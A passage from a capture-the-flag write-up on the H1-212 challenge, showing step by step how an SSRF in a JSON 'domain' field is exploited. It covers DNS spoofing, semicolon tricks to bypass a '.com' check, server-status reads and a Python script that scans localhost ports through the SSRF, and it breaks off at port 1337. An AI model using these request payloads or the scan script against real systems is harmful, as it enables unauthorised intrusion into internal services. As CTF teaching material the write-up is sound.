IDhweCAwcHg7CiAgICBwYWRkaW5nOiA4cHggOHB4IDhweCA4cHg7CgogICAgYm9yZGVyLXdpZHRoOiAxcHg7CiAgICBib3JkZXItc3R5bGU6IGRvdHRlZDsKICAgIGJvcmRlci1jb2xvcjogIzAwMDAwMDsKCiAgICBiYWNrZ3JvdW5kLWNvbG9yOiAjRjVGNkY3OwoKICAgIGZvbnQtc3R5bGU6IGl0YWxpYzsKICB9CgogIGRpdi5jb250ZW50X3NlY3Rpb25fdGV4dCBwIHsKICAgIG1hcmdpbi1ib3R0b206IDZweDsKICB9CgogIGRpdi5jb250ZW50X3NlY3Rpb25fdGV4dCB1bCwgZGl2LmNvbnRlbnRfc2VjdGlvbl90ZXh0IGxpIHsKICAgIHBhZGRpbmc6IDRweCA4cHggNHB4IDE2cHg7CiAgfQoKICBkaXYuc2VjdGlvbl9oZWFkZXIgewogICAgcGFkZGluZzogM3B4IDZweCAzcHggNnB4OwoKICAgIGJhY2tncm91bmQtY29sb3I6ICM4RTlDQjI7CgogICAgY29sb3I6ICNGRkZGRkY7CiAgICBmb250LXdlaWdodDogYm9sZDsKICAgIGZvbnQtc2l6ZTogMTEyJTsKICAgIHRleHQtYWxpZ246IGNlbnRlcjsKICB9CgogIGRpdi5zZWN0aW9uX2hlYWRlcl9yZWQgewogICAgYmFja2dyb3VuZC1jb2xvcjogI0NEMjE0RjsKICB9CgogIGRpdi5zZWN0aW9uX2hlYWRlcl9ncmV5IHsKICAgIGJhY2tncm91bmQtY29sb3I6ICM5RjkzODY7CiAgfQoKICAuZmxvYXRpbmdfZWxlbWVudCB7CiAgICBwb3NpdGlvbjogcmVsYXRpdmU7CiAgICBmbG9hdDogbGVmdDsKICB9CgogIGRpdi50YWJsZV9vZl9jb250ZW50c19pdGVtIGEsCiAgZGl2LmNvbnRlbnRfc2VjdGlvbl90ZXh0IGEgewogICAgdGV4dC1kZWNvcmF0aW9uOiBub25lOwogICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgfQoKICBkaXYudGFibGVfb2ZfY29udGVudHNfaXRlbSBhOmxpbmssCiAgZGl2LnRhYmxlX29mX2NvbnRlbnRzX2l0ZW0gYTp2aXNpdGVkLAogIGRpdi50YWJsZV9vZl9jb250ZW50c19pdGVtIGE6YWN0aXZlIHsKICAgIGNvbG9yOiAjMDAwMDAwOwogIH0KCiAgZGl2LnRhYmxlX29mX2NvbnRlbnRzX2l0ZW0gYTpob3ZlciB7CiAgICBiYWNrZ3JvdW5kLWNvbG9yOiAjMDAwMDAwOwoKICAgIGNvbG9yOiAjRkZGRkZGOwogIH0KCiAgZGl2LmNvbnRlbnRfc2VjdGlvbl90ZXh0IGE6bGluaywKICBkaXYuY29udGVudF9zZWN0aW9uX3RleHQgYTp2aXNpdGVkLAogICBkaXYuY29udGVudF9zZWN0aW9uX3RleHQgYTphY3RpdmUgewogICAgYmFja2dyb3VuZC1jb2xvcjogI0RDREZFNjsKCiAgICBjb2xvcjogIzAwMDAwMDsKICB9CgogIGRpdi5jb250ZW50X3NlY3Rpb25fdGV4dCBhOmhvdmVyIHsKICAgIGJhY2tncm91bmQtY29sb3I6ICMwMDAwMDA7CgogICAgY29sb3I6ICNEQ0RGRTY7CiAgfQoKICBkaXYudmFsaWRhdG9yIHsKICB9CiAgICA8L3N0eWxlPgogIDwvaGVhZD4KICA8Ym9keT4KICAgIDxkaXYgY2xhc3M9Im1haW5fcGFnZSI+CiAgICAgIDxkaXYgY2xhc3M9InBhZ2VfaGVhZGVyIGZsb2F0aW5nX2VsZW1lbnQiPgogICAgICAgIDxpbWcgc3JjPSIvaWNvbnMvdWJ1bnR1LWxvZ28ucG5nIiBhbHQ9IlVidW50dSBMb2dvIiBjbGFzcz0iZmxvYXRpbmdfZWxlbWVudCIvPgogICAgICAgIDxzcGFuIGNsYXNzPSJmbG9hdGluZ19lbGVtZW50Ij4KICAgICAgICAgIEFwYWNoZTIgVWJ1bnR1IERlZmF1bHQgUGFnZQogICAgICAgIDwvc3Bhbj4KICAgICAgPC9kaXY+CjwhLS0gICAgICA8ZGl2IGNsYXNzPSJ0YWJsZV9vZl9jb250ZW50cyBmbG9hdGluZ19lbGVtZW50Ij4KICAgICAgICA8ZGl2IGNsYXNzPSJzZWN0aW9uX2hlYWRlciBzZWN0aW9uX2hlYWRlcl9ncmV5Ij4KICAgICAgICAgIFRBQkxFIE9GIENPTlRFTlRTCiAgICAgICAgPC9kaXY+CiAgICAgICAgPGRpdiBjbGFzcz0idGFibGVfb2ZfY29udGVudHNfaXRlbSBmbG9hdGluZ19lbGVtZW50Ij4KICAgICAgICAgIDxhIGhyZWY9IiNhYm91dCI+QWJvdXQ8L2E+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPGRpdiBjbGFzcz0idGFibGVfb2ZfY29udGVudHNfaXRlbSBmbG9hdGluZ19lbGVtZW50Ij4KICAgICAgICAgIDxhIGhyZWY9IiNjaGFuZ2VzIj5DaGFuZ2VzPC9hPgogICAgICAgIDwvZGl2PgogICAgICAgIDxkaXYgY2xhc3M9InRhYmxlX29mX2NvbnRlbnRzX2l0ZW0gZmxvYXRpbmdfZWxlbWVudCI+CiAgICAgICAgICA8YSBocmVmPSIjc2NvcGUiPlNjb3BlPC9hPgogICAgICAgIDwvZGl2PgogICAgICAgIDxkaXYgY2xhc3M9InRhYmxlX29mX2NvbnRlbnRzX2l0ZW0gZmxvYXRpbmdfZWxlbWVudCI+CiAgICAgICAgICA8YSBocmVmPSIjZmlsZXMiPkNvbmZpZyBmaWxlczwvYT4KICAgICAgICA8L2Rpdj4KICAgICAgPC9kaXY+Ci0tPgogICAgICA8ZGl2IGNsYXNzPSJjb250ZW50X3NlY3Rpb24gZmxvYXRpbmdfZWxlbWVudCI+CgoKICAgICAgICA8ZGl2IGNsYXNzPSJzZWN0aW9uX2hlYWRlciBzZWN0aW9uX2hlYWRlcl9yZWQiPgogICAgICAgICAgPGRpdiBpZD0iYWJvdXQiPjwvZGl2PgogICAgICAgICAgSXQgd29ya3MhCiAgICAgICAgPC9kaXY+CiAgICAgICAgPGRpdiBjbGFzcz0iY29udGVudF9zZWN0aW9uX3RleHQiPgogICAgICAgICAgPHA+CiAgICAgICAgICAgICAgICBUaGlzIGlzIHRoZSBkZWZhdWx0IHdlbGNvbWUgcGFnZSB1c2VkIHRvIHRlc3QgdGhlIGNvcnJlY3QgCiAgICAgICAgICAgICAgICBvcGVyYXRpb24gb2YgdGhlIEFwYWNoZTIgc2VydmVyIGFmdGVyIGluc3RhbGxhdGlvbiBvbiBVYnVudHUgc3lzdGVtcy4KICAgICAgICAgICAgICAgIEl0IGlzIGJhc2VkIG9uIHRoZSBlcXVpdmFsZW50IHBhZ2Ugb24gRGViaWFuLCBmcm9tIHdoaWNoIHRoZSBVYnVudHUgQXBhY2hlCiAgICAgICAgICAgICAgICBwYWNrYWdpbmcgaXMgZGVyaXZlZC4KICAgICAgICAgICAgICAgIElmIHlvdSBjYW4gcmVhZCB0aGlzIHBhZ2UsIGl0IG1lYW5zIHRoYXQgdGhlIEFwYWNoZSBIVFRQIHNlcnZlciBpbnN0YWxsZWQgYXQKICAgICAgICAgICAgICAgIHRoaXMgc2l0ZSBpcyB3b3JraW5nIHByb3Blcmx5LiBZb3Ugc2hvdWxkIDxiPnJlcGxhY2UgdGhpcyBmaWxlPC9iPiAobG9jYXRlZCBhdAogICAgICAgICAgICAgICAgPHR0Pi92YXIvd3d3L2h0bWwvaW5kZXguaHRtbDwvdHQ+KSBiZWZvcmUgY29udGludWluZyB0byBvcGVyYXRlIHlvdXIgSFRUUCBzZXJ2ZXIuCiAgICAgICAgICA8L3A+CgoKICAgICAgICAgIDxwPgogICAgICAgICAgICAgICAgSWYgeW91IGFyZSBhIG5vcm1hbCB1c2VyIG9mIHRoaXMgd2ViIHNpdGUgYW5kIGRvbid0IGtub3cgd2hhdCB0aGlzIHBhZ2UgaXMKICAgICAgICAgICAgICAgIGFib3V0LCB0aGlzIHByb2JhYmx5IG1lYW5zIHRoYXQgdGhlIHNpdGUgaXMgY3VycmVudGx5IHVuYXZhaWxhYmxlIGR1ZSB0bwogICAgICAgICAgICAgICAgbWFpbnRlbmFuY2UuCiAgICAgICAgICAgICAgICBJZiB0aGUgcHJvYmxlbSBwZXJzaXN0cywgcGxlYXNlIGNvbnRhY3QgdGhlIHNpdGUncyBhZG1pbmlzdHJhdG9yLgogICAgICAgICAgPC9wPgoKICAgICAgICA8L2Rpdj4KICAgICAgICA8ZGl2IGNsYXNzPSJzZWN0aW9uX2hlYWRlciI+CiAgICAgICAgICA8ZGl2IGlkPSJjaGFuZ2VzIj48L2Rpdj4KICAgICAgICAgICAgICAgIENvbmZpZ3VyYXRpb24gT3ZlcnZpZXcKICAgICAgICA8L2Rpdj4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250ZW50X3NlY3Rpb25fdGV4dCI+CiAgICAgICAgICA8cD4KICAgICAgICAgICAgICAgIFVidW50dSdzIEFwYWNoZTIgZGVmYXVsdCBjb25maWd1cmF0aW9uIGlzIGRpZmZlcmVudCBmcm9tIHRoZQogICAgICAgICAgICAgICAgdXBzdHJlYW0gZGVmYXVsdCBjb25maWd1cmF0aW9uLCBhbmQgc3BsaXQgaW50byBzZXZlcmFsIGZpbGVzIG9wdGltaXplZCBmb3IKICAgICAgICAgICAgICAgIGludGVyYWN0aW9uIHdpdGggVWJ1bnR1IHRvb2xzLiBUaGUgY29uZmlndXJhdGlvbiBzeXN0ZW0gaXMKICAgICAgICAgICAgICAgIDxiPmZ1bGx5IGRvY3VtZW50ZWQgaW4KICAgICAgICAgICAgICAgIC91c3Ivc2hhcmUvZG9jL2FwYWNoZTIvUkVBRE1FLkRlYmlhbi5nejwvYj4uIFJlZmVyIHRvIHRoaXMgZm9yIHRoZSBmdWxsCiAgICAgICAgICAgICAgICBkb2N1bWVudGF0aW9uLiBEb2N1bWVudGF0aW9uIGZvciB0aGUgd2ViIHNlcnZlciBpdHNlbGYgY2FuIGJlCiAgICAgICAgICAgICAgICBmb3VuZCBieSBhY2Nlc3NpbmcgdGhlIDxhIGhyZWY9Ii9tYW51YWwiPm1hbnVhbDwvYT4gaWYgdGhlIDx0dD5hcGFjaGUyLWRvYzwvdHQ+CiAgICAgICAgICAgICAgICBwYWNrYWdlIHdhcyBpbnN0YWxsZWQgb24gdGhpcyBzZXJ2ZXIuCgogICAgICAgICAgPC9wPgogICAgICAgICAgPHA+CiAgICAgICAgICAgICAgICBUaGUgY29uZmlndXJhdGlvbiBsYXlvdXQgZm9yIGFuIEFwYWNoZTIgd2ViIHNlcnZlciBpbnN0YWxsYXRpb24gb24gVWJ1bnR1IHN5c3RlbXMgaXMgYXMgZm9sbG93czoKICAgICAgICAgIDwvcD4KICAgICAgICAgIDxwcmU+Ci9ldGMvYXBhY2hlMi8KfC0tIGFwYWNoZTIuY29uZgp8ICAgICAgIGAtLSAgcG9ydHMuY29uZgp8LS0gbW9kcy1lbmFibGVkCnwgICAgICAgfC0tICoubG9hZAp8ICAgICAgIGAtLSAqLmNvbmYKfC0tIGNvbmYtZW5hYmxlZAp8ICAgICAgIGAtLSAqLmNvbmYKfC0tIHNpdGVzLWVuYWJsZWQKfCAgICAgICBgLS0gKi5jb25mCiAgICAgICAgICA8L3ByZT4KICAgICAgICAgIDx1bD4KICAgICAgICAgICAgICAgICAgICAgICAgPGxpPgogICAgICAgICAgICAgICAgICAgICAgICAgICA8dHQ+YXBhY2hlMi5jb25mPC90dD4gaXMgdGhlIG1haW4gY29uZmlndXJhdGlvbgogICAgICAgICAgICAgICAgICAgICAgICAgICBmaWxlLiBJdCBwdXRzIHRoZSBwaWVjZXMgdG9nZXRoZXIgYnkgaW5jbHVkaW5nIGFsbCByZW1haW5pbmcgY29uZmlndXJhdGlvbgogICAgICAgICAgICAgICAgICAgICAgICAgICBmaWxlcyB3aGVuIHN0YXJ0aW5nIHVwIHRoZSB3ZWIgc2VydmVyLgogICAgICAgICAgICAgICAgICAgICAgICA8L2xpPgoKICAgICAgICAgICAgICAgICAgICAgICAgPGxpPgogICAgICAgICAgICAgICAgICAgICAgICAgICA8dHQ+cG9ydHMuY29uZjwvdHQ+IGlzIGFsd2F5cyBpbmNsdWRlZCBmcm9tIHRoZQogICAgICAgICAgICAgICAgICAgICAgICAgICBtYWluIGNvbmZpZ3VyYXRpb24gZmlsZS4gSXQgaXMgdXNlZCB0byBkZXRlcm1pbmUgdGhlIGxpc3RlbmluZyBwb3J0cyBmb3IKICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5jb21pbmcgY29ubmVjdGlvbnMsIGFuZCB0aGlzIGZpbGUgY2FuIGJlIGN1c3RvbWl6ZWQgYW55dGltZS4KICAgICAgICAgICAgICAgICAgICAgICAgPC9saT4KCiAgICAgICAgICAgICAgICAgICAgICAgIDxsaT4KICAgICAgICAgICAgICAgICAgICAgICAgICAgQ29uZmlndXJhdGlvbiBmaWxlcyBpbiB0aGUgPHR0Pm1vZHMtZW5hYmxlZC88L3R0PiwKICAgICAgICAgICAgICAgICAgICAgICAgICAgPHR0PmNvbmYtZW5hYmxlZC88L3R0PiBhbmQgPHR0PnNpdGVzLWVuYWJsZWQvPC90dD4gZGlyZWN0b3JpZXMgY29udGFpbgogICAgICAgICAgICAgICAgICAgICAgICAgICBwYXJ0aWN1bGFyIGNvbmZpZ3VyYXRpb24gc25pcHBldHMgd2hpY2ggbWFuYWdlIG1vZHVsZXMsIGdsb2JhbCBjb25maWd1cmF0aW9uCiAgICAgICAgICAgICAgICAgICAgICAgICAgIGZyYWdtZW50cywgb3IgdmlydHVhbCBob3N0IGNvbmZpZ3VyYXRpb25zLCByZXNwZWN0aXZlbHkuCiAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+CgogICAgICAgICAgICAgICAgICAgICAgICA8bGk+CiAgICAgICAgICAgICAgICAgICAgICAgICAgIFRoZXkgYXJlIGFjdGl2YXRlZCBieSBzeW1saW5raW5nIGF2YWlsYWJsZQogICAgICAgICAgICAgICAgICAgICAgICAgICBjb25maWd1cmF0aW9uIGZpbGVzIGZyb20gdGhlaXIgcmVzcGVjdGl2ZQogICAgICAgICAgICAgICAgICAgICAgICAgICAqLWF2YWlsYWJsZS8gY291bnRlcnBhcnRzLiBUaGVzZSBzaG91bGQgYmUgbWFuYWdlZAogICAgICAgICAgICAgICAgICAgICAgICAgICBieSB1c2luZyBvdXIgaGVscGVycwogICAgICAgICAgICAgICAgICAgICAgICAgICA8dHQ+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGEgaHJlZj0iaHR0cDovL21hbnBhZ2VzLmRlYmlhbi5vcmcvY2dpLWJpbi9tYW4uY2dpP3F1ZXJ5PWEyZW5tb2QiPmEyZW5tb2Q8L2E+LAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxhIGhyZWY9Imh0dHA6Ly9tYW5wYWdlcy5kZWJpYW4ub3JnL2NnaS1iaW4vbWFuLmNnaT9xdWVyeT1hMmRpc21vZCI+YTJkaXNtb2Q8L2E+LAogICAgICAgICAgICAgICAgICAgICAgICAgICA8L3R0PgogICAgICAgICAgICAgICAgICAgICAgICAgICA8dHQ+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGEgaHJlZj0iaHR0cDovL21hbnBhZ2VzLmRlYmlhbi5vcmcvY2dpLWJpbi9tYW4uY2dpP3F1ZXJ5PWEyZW5zaXRlIj5hMmVuc2l0ZTwvYT4sCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGEgaHJlZj0iaHR0cDovL21hbnBhZ2VzLmRlYmlhbi5vcmcvY2dpLWJpbi9tYW4uY2dpP3F1ZXJ5PWEyZGlzc2l0ZSI+YTJkaXNzaXRlPC9hPiwKICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvdHQ+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYW5kCiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0dD4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8YSBocmVmPSJodHRwOi8vbWFucGFnZXMuZGViaWFuLm9yZy9jZ2ktYmluL21hbi5jZ2k\/cXVlcnk9YTJlbmNvbmYiPmEyZW5jb25mPC9hPiwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8YSBocmVmPSJodHRwOi8vbWFucGFnZXMuZGViaWFuLm9yZy9jZ2ktYmluL21hbi5jZ2k\/cXVlcnk9YTJkaXNjb25mIj5hMmRpc2NvbmY8L2E+CiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvdHQ+LiBTZWUgdGhlaXIgcmVzcGVjdGl2ZSBtYW4gcGFnZXMgZm9yIGRldGFpbGVkIGluZm9ybWF0aW9uLgogICAgICAgICAgICAgICAgICAgICAgICA8L2xpPgoKICAgICAgICAgICAgICAgICAgICAgICAgPGxpPgogICAgICAgICAgICAgICAgICAgICAgICAgICBUaGUgYmluYXJ5IGlzIGNhbGxlZCBhcGFjaGUyLiBEdWUgdG8gdGhlIHVzZSBvZgogICAgICAgICAgICAgICAgICAgICAgICAgICBlbnZpcm9ubWVudCB2YXJpYWJsZXMsIGluIHRoZSBkZWZhdWx0IGNvbmZpZ3VyYXRpb24sIGFwYWNoZTIgbmVlZHMgdG8gYmUKICAgICAgICAgICAgICAgICAgICAgICAgICAgc3RhcnRlZC9zdG9wcGVkIHdpdGggPHR0Pi9ldGMvaW5pdC5kL2FwYWNoZTI8L3R0PiBvciA8dHQ+YXBhY2hlMmN0bDwvdHQ+LgogICAgICAgICAgICAgICAgICAgICAgICAgICA8Yj5DYWxsaW5nIDx0dD4vdXNyL2Jpbi9hcGFjaGUyPC90dD4gZGlyZWN0bHkgd2lsbCBub3Qgd29yazwvYj4gd2l0aCB0aGUKICAgICAgICAgICAgICAgICAgICAgICAgICAgZGVmYXVsdCBjb25maWd1cmF0aW9uLgogICAgICAgICAgICAgICAgICAgICAgICA8L2xpPgogICAgICAgICAgPC91bD4KICAgICAgICA8L2Rpdj4KCiAgICAgICAgPGRpdiBjbGFzcz0ic2VjdGlvbl9oZWFkZXIiPgogICAgICAgICAgICA8ZGl2IGlkPSJkb2Nyb290Ij48L2Rpdj4KICAgICAgICAgICAgICAgIERvY3VtZW50IFJvb3RzCiAgICAgICAgPC9kaXY+CgogICAgICAgIDxkaXYgY2xhc3M9ImNvbnRlbnRfc2VjdGlvbl90ZXh0Ij4KICAgICAgICAgICAgPHA+CiAgICAgICAgICAgICAgICBCeSBkZWZhdWx0LCBVYnVudHUgZG9lcyBub3QgYWxsb3cgYWNjZXNzIHRocm91Z2ggdGhlIHdlYiBicm93c2VyIHRvCiAgICAgICAgICAgICAgICA8ZW0+YW55PC9lbT4gZmlsZSBhcGFydCBvZiB0aG9zZSBsb2NhdGVkIGluIDx0dD4vdmFyL3d3dzwvdHQ+LAogICAgICAgICAgICAgICAgPGEgaHJlZj0iaHR0cDovL2h0dHBkLmFwYWNoZS5vcmcvZG9jcy8yLjQvbW9kL21vZF91c2VyZGlyLmh0bWwiPnB1YmxpY19odG1sPC9hPgogICAgICAgICAgICAgICAgZGlyZWN0b3JpZXMgKHdoZW4gZW5hYmxlZCkgYW5kIDx0dD4vdXNyL3NoYXJlPC90dD4gKGZvciB3ZWIKICAgICAgICAgICAgICAgIGFwcGxpY2F0aW9ucykuIElmIHlvdXIgc2l0ZSBpcyB1c2luZyBhIHdlYiBkb2N1bWVudCByb290CiAgICAgICAgICAgICAgICBsb2NhdGVkIGVsc2V3aGVyZSAoc3VjaCBhcyBpbiA8dHQ+L3NydjwvdHQ+KSB5b3UgbWF5IG5lZWQgdG8gd2hpdGVsaXN0IHlvdXIKICAgICAgICAgICAgICAgIGRvY3VtZW50IHJvb3QgZGlyZWN0b3J5IGluIDx0dD4vZXRjL2FwYWNoZTIvYXBhY2hlMi5jb25mPC90dD4uCiAgICAgICAgICAgIDwvcD4KICAgICAgICAgICAgPHA+CiAgICAgICAgICAgICAgICBUaGUgZGVmYXVsdCBVYnVudHUgZG9jdW1lbnQgcm9vdCBpcyA8dHQ+L3Zhci93d3cvaHRtbDwvdHQ+LiBZb3UKICAgICAgICAgICAgICAgIGNhbiBtYWtlIHlvdXIgb3duIHZpcnR1YWwgaG9zdHMgdW5kZXIgL3Zhci93d3cuIFRoaXMgaXMgZGlmZmVyZW50CiAgICAgICAgICAgICAgICB0byBwcmV2aW91cyByZWxlYXNlcyB3aGljaCBwcm92aWRlcyBiZXR0ZXIgc2VjdXJpdHkgb3V0IG9mIHRoZSBib3guCiAgICAgICAgICAgIDwvcD4KICAgICAgICA8L2Rpdj4KCiAgICAgICAgPGRpdiBjbGFzcz0ic2VjdGlvbl9oZWFkZXIiPgogICAgICAgICAgPGRpdiBpZD0iYnVncyI+PC9kaXY+CiAgICAgICAgICAgICAgICBSZXBvcnRpbmcgUHJvYmxlbXMKICAgICAgICA8L2Rpdj4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250ZW50X3NlY3Rpb25fdGV4dCI+CiAgICAgICAgICA8cD4KICAgICAgICAgICAgICAgIFBsZWFzZSB1c2UgdGhlIDx0dD51YnVudHUtYnVnPC90dD4gdG9vbCB0byByZXBvcnQgYnVncyBpbiB0aGUKICAgICAgICAgICAgICAgIEFwYWNoZTIgcGFja2FnZSB3aXRoIFVidW50dS4gSG93ZXZlciwgY2hlY2sgPGEKICAgICAgICAgICAgICAgIGhyZWY9Imh0dHBzOi8vYnVncy5sYXVuY2hwYWQubmV0L3VidW50dS8rc291cmNlL2FwYWNoZTIiPmV4aXN0aW5nCiAgICAgICAgICAgICAgICBidWcgcmVwb3J0czwvYT4gYmVmb3JlIHJlcG9ydGluZyBhIG5ldyBidWcuCiAgICAgICAgICA8L3A+CiAgICAgICAgICA8cD4KICAgICAgICAgICAgICAgIFBsZWFzZSByZXBvcnQgYnVncyBzcGVjaWZpYyB0byBtb2R1bGVzIChzdWNoIGFzIFBIUCBhbmQgb3RoZXJzKQogICAgICAgICAgICAgICAgdG8gcmVzcGVjdGl2ZSBwYWNrYWdlcywgbm90IHRvIHRoZSB3ZWIgc2VydmVyIGl0c2VsZi4KICAgICAgICAgIDwvcD4KICAgICAgICA8L2Rpdj4KCgoKCiAgICAgIDwvZGl2PgogICAgPC9kaXY+CiAgICA8ZGl2IGNsYXNzPSJ2YWxpZGF0b3IiPgogICAgPC9kaXY+CiAgPC9ib2R5Pgo8L2h0bWw+Cgo="}

What was even more interesting here, is that the listening dnschef actually received a remote DNS lookup request for “h1-212.rcesec.com” just as a consequence of the read.php call, which it successfully spoofed to “127.0.0.1”:

While this was the confirmation that the application actively interacts with the given “domain” value, there was also a second confirmation in form of the base64-encoded string returned in the response body, which was (when decoded) the actual content of the web server listening on “localhost”:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <!--
    Modified from the Debian original for Ubuntu
    Last updated: 2014-03-19
    See: https://launchpad.net/bugs/1288690
  -->
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>Apache2 Ubuntu Default Page: It works</title>
    <style type="text/css" media="screen">
  * {
    margin: 0px 0px 0px 0px;
    padding: 0px 0px 0px 0px;
  }
[...]

The Wrong Direction

While I was at first somehow convinced that the flag had to reside somewhere on the localhost (due to a thrill of anticipation probably? ;-) ), I first wanted to retrieve the contents of Apache’s server-status page (which is usually bound to the localhost) to potentially fetch the flag from there on. However when trying to query that page using the following request (remember “h1-212.rcesec.com” did actually resolve to “127.0.0.1”, which applied to all further requests):

POST / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes
Content-Type: application/json
Content-Length: 44

{"domain":"h1-212.rcesec.com/server-status"}

The application just returned an error, indicating that there was at least a very basic validation of the domain name in place requiring the domain value to be ended with the string “.com”:

HTTP/1.1 418 I'm a teapot
Date: Wed, 15 Nov 2017 07:32:32 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 60
Connection: close
Content-Type: application/json

{"error":{"domain":"incorrect value, .com domain expected"}}

Bypassing the Domain Validation (Part 1)

OK, so the application expected the domain to end with a “.com”. While trying to bypass this on common ways using i.e. “?”:

POST / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes
Content-Type: application/json
Content-Length: 49

{"domain":"h1-212.rcesec.com/server-status?.com"}

The application always responded with:

HTTP/1.1 418 I'm a teapot
Date: Wed, 15 Nov 2017 07:37:15 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 46
Connection: close
Content-Type: application/json

{"error":{"domain":"domain cannot contain ?"}}

The same applies to “&”, “#” and (double-) URL-encoded representations of it. However when a semicolon was used:

POST / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes
Content-Type: application/json
Content-Length: 50

{"domain":"h1-212.rcesec.com/server-status/;.com"}

The application responded again with a reference to the read.php file:

HTTP/1.1 200 OK
Date: Wed, 15 Nov 2017 07:39:36 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 26
Connection: close
Content-Type: text/html; charset=UTF-8

{"next":"\/read.php?id=3"}

Following that one, indeed returned a base64-encoded string of the server-status output:

HTTP/1.1 200 OK
Date: Wed, 15 Nov 2017 07:40:33 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 50180
Connection: close
Content-Type: text/html; charset=UTF-8

{"data":"PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURC *CENSORED*"}

While I was thinking “yeah I got it finally”, it turned out that there wasn’t a flag anywhere. Although I think it was also not intended to expose the Apache-Status page at all by the engineer ;-) :

The Right Direction

While I was poking around on the localhost to find the flag for a while without any luck, I decided to go a different way and use the discovered SSRF vulnerability in order to see whether there are any other open ports listening on localhost, which are otherwise not visible from the outside. To be clear: a port scan from the Internet on the target host did only reveal the open ports 22 and 80:

Since port 22 was known to be open, it could be easily verified by using the SSRF vulnerability to check whether the port can actually be reached via localhost as well:

POST / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes
Content-Type: application/json
Content-Length: 38

{"domain":"h1-212.rcesec.com:22;.com"}

This returned the following output (after querying the read.php file again):

HTTP/1.1 200 OK
Date: Wed, 15 Nov 2017 08:07:48 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 91
Connection: close
Content-Type: text/html; charset=UTF-8

{"data":"U1NILTIuMC1PcGVuU1NIXzcuMnAyIFVidW50dS00dWJ1bnR1Mi4yDQpQcm90b2NvbCBtaXNtYXRjaC4K"}

Base64-decoded:

SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2
Protocol mismatch.

Et voila. Since scanning all ports manually and requesting everything using the read.php file was a bit inefficient, I’ve wrote a small Python script which is capable of scanning a range of given ports numbers (i.e. from 81 to 1338), fetching the “next” response and finally tries to base64-decode its value:

import requests
import json
import base64

try:
	from requests.packages.urllib3.exceptions import InsecureRequestWarning
	requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
except:
	pass

proxies = {
  'http': 'http://127.0.0.1:8080',
  'https': 'http://127.0.0.1:8080',
}

cookies = {"admin":"yes"}
headers = {"User-Agent": "Mozilla/5.0", "Host":"admin.acme.org", "Content-Type":"application/json"}

def make_session(x):
	url = "http://104.236.20.43/index.php"
	payload = {"domain":"h1-212.rcesec.com:"+str(x)+";.com"}
	r = requests.post(url, headers=headers, verify=False, cookies=cookies, proxies=proxies, data=json.dumps(payload))
	data = json.loads(r.text)['next']

	url = "http://104.236.20.43" + data
	r = requests.get(url, headers=headers, verify=False, cookies=cookies, proxies=proxies)
	data = json.loads(r.text)['data']
	if data != "":
		print "33[92mFound open port:33[91m " + str(x) + "\n33[92mReading data: 33[0;0m" + base64.b64decode(data)

for x in range(81, 1338):
	make_session(x)

When run my script finally discovered another open port: 1337 (damn, that was obvious ;-) ):

Bypassing the Domain Validation (Part 2)

So it seemed like the flag could be located somewhere on the service behind port 1337. However I noticed an interesting behaviour I haven’t thought about earlier: When a single slash after the port number was used:

POST / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes
Content-Type: application/json
Content-Length: 41

{"domain":"h1-212.rcesec.com:1337/;.com"}

